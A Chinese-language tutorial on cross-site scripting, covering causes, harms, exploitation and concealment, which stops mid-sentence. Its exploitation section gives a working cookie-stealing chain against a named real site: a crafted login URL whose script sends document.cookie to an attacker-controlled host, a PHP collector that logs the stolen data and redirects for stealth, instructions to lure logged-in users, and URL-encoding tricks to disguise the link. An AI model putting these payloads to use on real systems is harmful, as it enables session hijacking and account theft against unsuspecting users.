跨站腳本執行漏洞詳解

【前言】

本文主要介紹跨站腳本執行漏洞的成因，形式，危害，利用方式，隱藏技巧，解決方法和常見問題 （FAQ），由於目前介紹跨站腳本執行漏洞的資料還不是很多，而且一般也不是很詳細，所以希望本文能夠 比較詳細的介紹該漏洞。由於時間倉促，水平有限，本文可能有不少錯誤，希望大家不吝賜教。

聲明，請不要利用本文介紹的任何內容，代碼或方法進行破壞，否則一切後果自負！

【漏洞成因】
原因很簡單，就是因為CGI程序沒有對用戶提交的變量中的HTML代碼進行過濾或轉換。

【漏洞形式】
這裡所說的形式，實際上是指CGI輸入的形式，主要分為兩種：
1．顯示輸入
2．隱式輸入
其中顯示輸入明確要求用戶輸入數據，而隱式輸入則本來並不要求用戶輸入數據，但是用戶卻可以通 過輸入數據來進行干涉。
顯示輸入又可以分為兩種：
1． 輸入完成立刻輸出結果
2． 輸入完成先存儲在文本文件或數據庫中，然後再輸出結果
注意：後者可能會讓你的網站面目全非！：（
而隱式輸入除了一些正常的情況外，還可以利用服務器或CGI程序處理錯誤信息的方式來實施。

【漏洞危害】
大家最關心的大概就要算這個問題了，下面列舉的可能並不全面，也不系統，但是我想應該是比較典 型的吧。
1． 獲取其他用戶Cookie中的敏感數據
2． 屏蔽頁面特定信息
3． 偽造頁面信息
4． 拒絕服務攻擊
5． 突破外網內網不同安全設置
6． 與其它漏洞結合，修改系統設置，查看系統文件，執行系統命令等
7． 其它
一般來說，上面的危害還經常伴隨著頁面變形的情況。而所謂跨站腳本執行漏洞，也就是通過別人的 網站達到攻擊的效果，也就是說，這種攻擊能在一定程度上隱藏身份。

【利用方式】
下面我們將通過具體例子來演示上面的各種危害，這樣應該更能說明問題，而且更易於理解。為了條 理更清晰一些，我們將針對每種危害做一個實驗。
為了做好這些實驗，我們需要一個抓包軟件，我使用的是Iris，當然你可以選擇其它的軟件，比如 NetXray什麼的。至於具體的使用方法，請參考相關幫助或手冊。
另外，需要明白的一點就是：只要服務器返回用戶提交的信息，就可能存在跨站腳本執行漏洞。
好的，一切就緒，我們開始做實驗！：）

實驗一：獲取其他用戶Cookie中的敏感信息
我們以國內著名的同學錄站點5460.net為例來說明一下，請按照下面的步驟進行：
1． 進入首頁http://www.5460.net/
2． 輸入用戶名“<h1>”，提交，發現服務器返回信息中包含了用戶提交的“<h1>”。
3． 分析抓包數據，得到實際請求：
&passwd=&ok.x=28&ok.y=6" target=_blank>http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
4． 構造一個提交，目標是能夠顯示用戶Cookie信息：
alert" target=_blank>http://www.5460.net/txl/login/login.pl?username=<script>alert(document.cookie)</ script>&passwd=&ok.x=28&ok.y=6
5． 如果上面的請求獲得預期的效果，那麼我們就可以嘗試下面的請求：
window.open" target=_blank>http://www.5460.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/ info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
其中http://www.notfound.org/info.php是你能夠控制的某台主機上的一個腳本，功能是獲取查詢字符串的信 息，內容如下：
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."/n");
fclose($fp);
}
header("Location: http://www.5460.net");
注：“%2B”為“+”的URL編碼，並且這裡只能用“%2B”，因為“+”將被作為空格處理。後面的header語 句則純粹是為了增加隱蔽性。
6． 如果上面的URL能夠正確運行的話，下一步就是誘使登陸5460.net的用戶訪問該URL，而我們就可以 獲取該用戶Cookie中的敏感信息。
7． 後面要做什麼就由你決定吧！

實驗二：屏蔽頁面特定信息
我們仍然以5460.net作為例子，下面是一個有問題的CGI程序：
http://www.5460.net/txl/liuyan/liuyanSql.pl
該CGI程序接受用戶提供的三個變量，即nId，csId和cName，但是沒有對用戶提交的cName變量進行任何檢 查，而且該CGI程序把cName的值作為輸出頁面的一部分，5460.net的用戶應該都比較清楚留言右下角有你 的名字，對吧？
既然有了上面的種種條件，我們可以不妨作出下面的結論：
某個用戶可以“屏蔽”其兩次留言之間的所有留言！
當然，我們說的“屏蔽”不是“刪除”，用戶的留言還是存在的，只不過由於HTML的特性，我們無法從 頁面看到，當然如果你喜歡查看源代碼的話就沒有什麼用處了，但是出了我們這些研究CGI安全的人來 說，有多少人有事沒事都看HTML源代碼？
由於種種原因，我在這裡就不公布具體的細節了，大家知道原理就好了。
注：仔細想想，我們不僅能屏蔽留言，還能匿名留言，Right？

實驗三：偽造頁面信息
如果你理解了上面那個實驗，這個實驗就沒有必要做了，基本原理相同，只是實現起來稍微麻煩一點而 已。

實驗四：拒絕服務攻擊
現在應該知道，我們在某種程度上可以控制存在跨站腳本執行漏洞的服務器的行為，既然這樣，我們 就可以控制服務器進行某種消耗資源的動作。比如說運行包含死循環或打開無窮多個窗口的JavaScript腳本 等等。這樣訪問該URL的用戶系統就可能因此速度變慢甚至崩潰。同樣，我們也可能在其中嵌入一些腳 本，讓該服務器請求其它服務器上的資源，如果訪問的資源比較消耗資源，並且訪問人數比較多的話，那 麼被訪問的服務器也可能被拒絕服務，而它則認為該拒絕服務攻擊是由訪問它的服務器發起的，這樣就可 以隱藏身份。

實驗五：突破外網內網不同安全設置
這個應該很好理解吧，一般來說我們的浏覽器對不同的區域設置了不同的安全級別。舉例來說，對於 Internet區域，可能你不允許JavaScript執行，而在Intranet區域，你就允許JavaScript執行。一般來說，前者的 安全級別都要高於後者。這樣，一般情況下別人無法通過執行惡意JavaScript腳本對你進行攻擊，但是如果 與你處於相同內網的服務器存在跨站腳本執行漏洞，那麼攻擊者就有機可乘了，因為該服務器位於Intranet 區域。

實驗六：與其它漏洞結合，修改系統設置，查看系統文件，執行系統命令等
由於與浏覽器相關的漏洞太多了，所以可與跨站腳本執行漏洞一起結合的漏洞也就顯得不少。我想這 些問題大家都應該很清楚吧，前些時間的修改IE標題漏洞，錯誤MIME類型執行命令漏洞，還有多種多樣 的蠕蟲，都是很好的例子。
更多的例子請參考下列鏈接：
Internet Explorer Pop-Up OBJECT Tag Bug
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
Internet Explorer Javascript Modeless Popup Local Denial of Service Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
MSIE6 can read local files
http://www.xs4all.nl/~jkuperus/bug.htm
MSIE may download and run progams automatically
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html
File extensions spoofable in MSIE download dialog
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html
the other IE cookie stealing bug (MS01-055)
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html
Microsoft Security Bulletin MS01-055
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html
Serious security Flaw in Microsoft Internet Explorer - Zone Spoofing
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
http://www.kriptopolis.com/cua/eml.html

跨站腳本執行漏洞在這裡的角色就是隱藏真正攻擊者的身份。

實驗七：其它
其實這類問題和跨站腳本執行漏洞沒有多大關系，但是在這裡提一下還是很有必要的。問題的實質還 是CGI程序沒有過濾用戶提交的數據，然後進行了輸出處理。舉個例子來說，支持SSI的服務器上的CGI程 序輸出了用戶提交的數據，無論該數據是采取何種方式輸入，都可能導致SSI指令的執行。當然，這是在服 務端，而不是客戶端執行。其實像ASP，PHP和Perl等CGI語言都可能導致這種問題。

【隱藏技巧】
出於時間的考慮，我在這裡將主要講一下理論了，相信不是很難懂，如果實在有問題，那麼去找本書 看吧。
1． URL編碼
比較一下：
&passwd=&ok.x=28&ok.y=6" target=_blank>http://www.5460.net/txl/login/login.pl?username=<h1>&passwd=&ok.x=28&ok.y=6
http://www.5460.net/txl/login/login.pl?username=%3C%68%31%3E&passwd=&ok.x=28&ok.y＝6
你覺得哪個更有隱蔽性？！

2． 隱藏在其它對象之下
與直接給別人一個鏈接相比，你是否決定把該鏈接隱藏在按鈕以下更好些呢？

3． 嵌入頁面中
讓別人訪問一個地址（注